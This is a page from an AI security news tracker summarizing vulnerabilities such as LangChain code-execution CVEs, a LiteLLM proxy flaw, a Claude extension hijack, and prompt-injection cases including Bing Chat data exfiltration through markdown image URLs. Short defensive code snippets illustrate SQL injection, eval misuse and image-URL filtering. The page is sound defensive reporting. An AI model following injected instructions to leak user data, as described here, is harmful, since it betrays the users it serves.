aisecwatch.com

Real-time AI security monitoring. Tracking AI-related vulnerabilities, safety and security incidents, privacy risks, research developments, and policy changes.


Maintained by Truong (Jack) Luu, Information Systems Researcher

AI Sec Watch

The security intelligence platform for AI teams

AI security threats move fast and get buried under hype and noise. AI Sec Watch was built by an Information Systems Security researcher to help security teams and developers stay ahead of vulnerabilities, privacy incidents, safety research, and policy developments.

Independent research. No sponsors, no paywalls, no conflicts of interest.

Total tracked: 3,710 · Last 24 hours: 1 · Last 7 days: 1
Daily Briefing · Friday, May 8, 2026

> Critical RCE Vulnerabilities in LiteLLM Proxy Server: LiteLLM, a proxy server that forwards requests to AI model APIs, disclosed three critical- and high-severity flaws in versions 1.74.2 through 1.83.6. Two test endpoints allowed attackers with valid API keys to execute arbitrary code (run any commands they want) on the server by submitting malicious configurations or prompt templates without sandboxing (CVE-2026-42271 and CVE-2026-42203, both critical), while a SQL injection flaw (inserting malicious code into database queries) let unauthenticated attackers read or modify stored API credentials (CVE-2026-42208, high).

> ClaudeBleed Exploit Allows Extension Hijacking in Chrome: Anthropic's Claude browser extension contains a vulnerability that lets malicious Chrome extensions hijack it and perform unauthorized actions such as exfiltrating files, sending emails, or stealing code from private repositories. The flaw stems from the extension trusting any script from claude.ai without verifying the actual caller, and while Anthropic released a partial fix in version 1.0.70 on May 6, researchers report it remains exploitable when the extension runs in privileged mode.

> AI Systems Show Triple the High-Risk Vulnerabilities of Legacy Software: Penetration testing data reveals that AI and LLM systems have 32% of findings rated high-risk, compared with just 13% for traditional software, and that only 38% of high-risk AI issues get resolved. Security experts attribute the gap to rapid deployment without mature controls, novel attack surfaces like prompt injection (tricking AI by hiding instructions in its input), and fragmented responsibility for remediation across teams.

> Model Context Protocol Emerging as Critical Security Blind Spot: Model Context Protocol (MCP, a plugin system connecting AI agents to external tools) has become a major vulnerability vector as organizations fail to scan for or monitor MCP-related risks. Recent supply chain attacks, such as the postmark-mcp npm package that exfiltrated emails from 300 organizations, demonstrate how attackers exploit widely trusted MCP packages and hardcoded credentials in AI configurations to enable credential theft and supply chain compromise at scale.

Latest Intel (page 317 of 371)

01

CVE-2023-37273: Auto-GPT is an experimental open-source application showcasing the capabilities of the GPT-4 language model. Running Aut…

security
Jul 13, 2023

Auto-GPT versions before 0.4.3 have a security flaw where the docker-compose.yml file (a configuration file that sets up Docker containers) is mounted into the container without write protection. If an attacker tricks Auto-GPT into running malicious code through the `execute_python_file` or `execute_python_code` commands, they can overwrite this file and gain control of the host system (the main computer running Auto-GPT) when it restarts.

Fix: Update to Auto-GPT version 0.4.3 or later.

NVD/CVE Database
02

Google Docs AI Features: Vulnerabilities and Risks

security · safety
Jul 12, 2023

Google Docs recently added new AI features, such as automatic summaries and creative content generation, which are helpful but introduce security risks. The main concern is that using these AI features on untrusted data (information you don't know the source or reliability of) could lead to unwanted consequences, though currently attackers have limited ways to exploit these features.

Embrace The Red
03

OpenAI Removes the "Chat with Code" Plugin From Store

security
Jul 6, 2023

OpenAI removed the 'Chat with Code' plugin from its store after security researchers discovered it was vulnerable to CSRF (cross-site request forgery, where an attacker tricks a system into making unwanted actions on behalf of a user). The vulnerability allowed ChatGPT to accidentally create GitHub issues without user permission when certain plugins were enabled together.

Embrace The Red
04

CVE-2023-36189: SQL injection vulnerability in langchain before v0.0.247 allows a remote attacker to obtain sensitive information via th…

security
Jul 6, 2023

A SQL injection vulnerability (a type of attack where an attacker inserts malicious SQL commands into input fields) exists in langchain versions before v0.0.247 in the SQLDatabaseChain component, allowing remote attackers to obtain sensitive information from databases.

Fix: Update langchain to version v0.0.247 or later.

NVD/CVE Database
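The SQLDatabaseChain flaw above is an instance of the classic SQL injection pattern. As a generic illustration (this is not LangChain's actual code, and the `users` table is made up for the sketch), the snippet below contrasts string-built SQL with a parameterized query using Python's stdlib sqlite3:

```python
import sqlite3

# Minimal in-memory database standing in for an app's credential store.
conn = sqlite3.connect(":memory:")
conn.execute("CREATE TABLE users (name TEXT, secret TEXT)")
conn.execute("INSERT INTO users VALUES ('alice', 'alice-secret')")
conn.execute("INSERT INTO users VALUES ('bob', 'bob-secret')")

def lookup_unsafe(name):
    # Vulnerable pattern: user text is spliced directly into the SQL string,
    # so the payload below escapes the quoted literal and rewrites the query.
    query = f"SELECT secret FROM users WHERE name = '{name}'"
    return conn.execute(query).fetchall()

def lookup_safe(name):
    # Parameterized query: the driver treats the input strictly as data.
    return conn.execute("SELECT secret FROM users WHERE name = ?", (name,)).fetchall()

payload = "nobody' OR '1'='1"
print(lookup_unsafe(payload))  # dumps every secret in the table
print(lookup_safe(payload))    # returns nothing: no user has that literal name
```

The injected `' OR '1'='1` turns the WHERE clause into a tautology in the unsafe version; the parameterized version is immune because the placeholder can never change the query's structure.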
05

CVE-2023-36188: An issue in langchain v.0.0.64 allows a remote attacker to execute arbitrary code via the PALChain parameter in the Pyth…

security
Jul 6, 2023

CVE-2023-36188 is a vulnerability in langchain version 0.0.64 that allows a remote attacker to execute arbitrary code (running commands they shouldn't be able to run) through the PALChain parameter in Python's exec method. This is a type of injection attack (CWE-74, where an attacker tricks a system by inserting malicious code into input that gets processed as commands).

Fix: A patch is available at https://github.com/hwchase17/langchain/pull/6003

NVD/CVE Database
06

CVE-2023-36258: An issue in LangChain before 0.0.236 allows an attacker to execute arbitrary code because Python code with os.system, ex…

security
Jul 3, 2023

CVE-2023-36258 is a vulnerability in LangChain before version 0.0.236 that allows an attacker to execute arbitrary code (run any commands they want on a system) by exploiting the ability to use Python functions like os.system, exec, or eval (functions that can run code dynamically). This is a code injection vulnerability (CWE-94, where attackers trick a program into running unintended code).

Fix: Upgrade LangChain to version 0.0.236 or later.

NVD/CVE Database
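The bug class behind this CVE (and the PALChain one above) is passing attacker-influenced text to Python's dynamic execution functions. A minimal sketch of the pattern and one common mitigation, not LangChain's actual code:

```python
import ast

untrusted = "__import__('os').system('echo pwned')"

# Dangerous pattern: eval() executes arbitrary Python, so attacker-controlled
# text becomes attacker-controlled code.
#   eval(untrusted)   # would run a shell command if uncommented

# Safer alternative when only literal values need parsing: ast.literal_eval
# accepts only constants, tuples, lists, dicts, and sets, and raises
# ValueError on anything executable (such as the call expression above).
try:
    ast.literal_eval(untrusted)
except ValueError:
    print("rejected: input is not a plain literal")

print(ast.literal_eval("[1, 2, 3]"))  # harmless literals still parse fine
```

When the application genuinely needs to run model-generated code (as agent frameworks do), the mitigation is sandboxing the execution environment rather than input parsing.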
07

CVE-2023-34541: Langchain 0.0.171 is vulnerable to Arbitrary code execution in load_prompt.

security
Jun 20, 2023

Langchain version 0.0.171 has a vulnerability that allows arbitrary code execution (running uncontrolled commands on a system) through its load_prompt function. The vulnerability was reported in June 2023, but the provided source material does not contain detailed information about how the vulnerability works or its severity rating.

NVD/CVE Database
08

Plugin Vulnerabilities: Visit a Website and Have Your Source Code Stolen

security · safety
Jun 20, 2023

OpenAI's plugin store contains security vulnerabilities, particularly in plugins that can act on behalf of users without adequate security review. These plugins are susceptible to prompt injection attacks (tricking an AI by hiding instructions in its input) and the Confused Deputy Problem (where an attacker can manipulate a plugin into performing harmful actions by exploiting its trust in the AI system), allowing adversaries to steal source code or cause other damage.

Embrace The Red
09

Bing Chat: Data Exfiltration Exploit Explained

security
Jun 18, 2023

Bing Chat contained a prompt injection vulnerability (tricking an AI by hiding instructions in its input) where malicious text on websites could trick the AI into returning markdown image tags that send sensitive data to an attacker's server. When Bing Chat's client converts markdown to HTML, an attacker can embed data in the image URL, exfiltrating (stealing and sending out) information without the user knowing.

Embrace The Red
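The exfiltration channel here is just markdown-to-HTML rendering: an `<img>` tag fetches its URL automatically, carrying whatever the attacker embedded in it. A minimal client-side mitigation sketch (the allowlist and helper below are hypothetical, not Microsoft's actual fix) is to filter image tags in model output before rendering:

```python
import re
from urllib.parse import urlparse

# Hypothetical allowlist of hosts the chat client trusts to serve images.
ALLOWED_IMAGE_HOSTS = {"www.bing.com"}

MD_IMAGE = re.compile(r"!\[[^\]]*\]\(([^)\s]+)[^)]*\)")

def strip_untrusted_images(markdown: str) -> str:
    """Drop markdown image tags whose URL points outside the allowlist.

    Rendering ![x](https://attacker.example/?q=SECRET) as an <img> makes the
    browser send SECRET to attacker.example, so filter before rendering.
    """
    def replace(match):
        host = urlparse(match.group(1)).hostname or ""
        return match.group(0) if host in ALLOWED_IMAGE_HOSTS else "[image removed]"
    return MD_IMAGE.sub(replace, markdown)

reply = "Here you go ![pic](https://attacker.example/leak?data=user-session-token)"
print(strip_untrusted_images(reply))  # the image tag is replaced, token never sent
```

Vendors ultimately addressed this class of bug with content security policies restricting which origins rendered chat output may load resources from; the filter above illustrates the same idea at the application layer.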
10

CVE-2023-34540: Langchain before v0.0.225 was discovered to contain a remote code execution (RCE) vulnerability in the component JiraAPI…

security
Jun 14, 2023

Langchain versions before v0.0.225 contained a remote code execution (RCE, where attackers can run commands on a system they don't own) vulnerability in the JiraAPIWrapper component that allowed attackers to execute arbitrary code through specially crafted input.

Fix: Update Langchain to v0.0.225 or later.

NVD/CVE Database